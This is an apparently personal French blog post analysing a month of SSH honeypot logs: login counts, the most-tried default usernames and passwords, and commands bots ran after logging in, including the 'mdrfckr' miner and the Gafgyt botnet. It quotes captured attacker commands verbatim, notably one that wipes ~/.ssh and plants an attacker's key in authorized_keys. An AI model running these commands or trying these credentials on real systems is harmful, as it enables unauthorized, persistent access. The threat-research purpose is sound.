Qu’est-ce qu’un honeypot ?
Un honeypot détecte et enregistre les attaques lorsqu’un attaquant tente de pénétrer dans un système. Le honeypot dont nous allons parler ici est un honeypot SSH.
Pourquoi ?
Aucune idée, je l’ai juste fait pour des recherches et pour ma satisfaction personnelle…
Environnement
OS : Ubuntu 24.04 LTS x86_64
Noyau : 6.8.0-31-generic
Tentatives de connexion
cat X.log | grep -c "login attempt"
11599
Il y a eu un total de 11 599 tentatives de connexion. Divisé par 30 jours, cela signifie une moyenne de 386 tentatives de connexion par jour.
Noms d’utilisateurs utilisés
cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
8181 root
977 345gs5662d34
359 admin
198 pi
105 0
71 ubuntu
51 ubnt
46 support
37 user
30 oracle
Comme prévu, de nombreuses attaques ciblent des noms d’utilisateurs habituels et par défaut.
Pour l’utilisateur 345gs5662d34
, selon les recherches de l’Université d’Aalborg au Danemark, il pourrait s’agir des identifiants par défaut d’un téléphone IP Polycom CX600.
Vérifiez ici :
SweetCam : un honeypot de caméra IP
Mots de passe
cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
977 345gs5662d34
967 3245gs5662d34
246 admin
239 123456
208 password
155 0
88 root
75 raspberry
73 123
66 raspberryraspberry993311
Une fois de plus, on retrouve le même que le nom d’utilisateur par défaut pour le téléphone IP Polycom CX600.
Commandes exécutées après connexion
cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
6775 echo -e "\x6F\x6B"
1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
320 uname -s -v -n -r -m
112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
87 uname -a
29 ps | grep '[Mm]iner'
29 ps -ef | grep '[Mm]iner'
29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/ /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/
29 ifconfig
29 echo Hi | cat -n
29 cat /proc/cpuinfo
29 /ip cloud print
23 whoami
23 which ls
23 w
23 uname -m
23 uname
23 top
23 lscpu | grep Model
23 ls -lh $(which ls)
23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
23 crontab -l
23 cat /proc/cpuinfo | grep name | wc -l
23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
23 cat /proc/cpuinfo | grep model | grep name | wc -l
Voici maintenant la partie intéressante.
Le script oinasf
L’exécution d’un script mystérieux, ./oinasf
, suivie de tentatives de lecture et d’affichage du contenu exécutable du système, indique une stratégie de sondage pour détecter des vulnérabilités ou des informations précieuses. L’utilisation de /ip cloud print
suggère que des bots ciblent les routeurs MikroTik pour accéder ou perturber des services basés sur le cloud, tandis que uname -s -m
leur fournit des informations essentielles sur le système d’exploitation et l’architecture matérielle, utiles pour élaborer des actions ultérieures adaptées aux spécificités du système. En conclusion, ces commandes représentent une stratégie claire pour infiltrer, évaluer et établir un contrôle sur les systèmes ciblés. Elles soulignent la préférence des bots pour la manipulation directe et un accès durable, mettant en évidence le besoin critique de défenses robustes contre ces tactiques courantes mais potentiellement dévastatrices.
Le crypto-mineur mdrfckr
Ce mineur crée simplement une tâche cron qui supprime tout dans le dossier .ssh
, ajoute une unique clé ssh et verrouille l’accès aux autres utilisateurs.
Ensuite, il tue les autres mineurs s’ils existent pour avoir le champ libre.
Vous pouvez consulter ce dépôt de quelqu’un qui a déjà été piraté et où ce mineur a été utilisé sur son serveur : Dump of the crypto-miner that got installed on my system - Github
Le malware MIPS
Probablement un autre malware d’architecture MIPS (Multiprocesseur sans étapes de pipeline interbloquées), ciblant les routeurs et appareils IoT.
Voici une bonne lecture et analyse du comportement d’un malware MIPS :
Analyzing a Backdoor/Bot for the MIPS Platform
Le script Sakura.sh
Ce script fait partie du malware Gafgyt.
Gafgyt, aussi connu sous le nom BASHLITE, est un botnet affectant les appareils Internet des Objets (IoT) et les systèmes basés sur Linux. Le malware vise à compromettre et prendre le contrôle de ces appareils, souvent en exploitant des mots de passe faibles ou par défaut, ainsi que des vulnérabilités connues. Gafgyt existe depuis 2014 et a évolué en plusieurs variantes, chacune avec ses propres fonctionnalités et capacités, y compris la capacité de lancer des attaques par déni de service distribué (DDoS).
Voici une analyse détaillée du malware Gafgyt ciblant les appareils IoT
Discussion
Laisser un commentaire
Les commentaires des invités seront examinés avant d'apparaître sur le site.
Aucun commentaire pour le moment. Soyez le premier à commencer la discussion !